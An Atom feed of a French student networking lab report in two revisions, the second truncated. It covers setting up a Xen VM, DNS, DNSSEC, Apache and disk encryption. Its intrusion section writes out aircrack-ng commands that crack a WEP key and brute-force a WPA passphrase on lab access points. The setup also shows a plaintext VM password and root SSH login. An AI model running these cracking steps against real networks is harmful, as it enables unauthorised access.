<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Sbensale</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Sbensale"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Sbensale"/>
		<updated>2026-05-12T22:00:21Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58093</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58093"/>
				<updated>2022-01-12T17:49:01Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==Ansible==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
==Consult==&lt;br /&gt;
&lt;br /&gt;
on installe consult et un container docker&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Create group&amp;quot;&lt;br /&gt;
   group:&lt;br /&gt;
     name: consul&lt;br /&gt;
     gid: 666&lt;br /&gt;
 - name: &amp;quot;Create user&amp;quot;&lt;br /&gt;
   user:&lt;br /&gt;
     name: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
     uid: 666&lt;br /&gt;
 - name: &amp;quot;Create /etc/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /etc/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Create /var/lib/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /var/lib/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Client json&amp;quot;&lt;br /&gt;
   copy:&lt;br /&gt;
     src: consul.json&lt;br /&gt;
     dest: /etc/consul/consul.json&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Start consul with container&amp;quot;&lt;br /&gt;
   docker_container:&lt;br /&gt;
     name: dockerConsul&lt;br /&gt;
     image: bitnami/consul&lt;br /&gt;
     volumes:&lt;br /&gt;
       - /etc/consul&lt;br /&gt;
     network_mode: host&lt;br /&gt;
     user: consul&lt;br /&gt;
     groups:&lt;br /&gt;
       - consul&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58092</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58092"/>
				<updated>2022-01-12T17:48:34Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
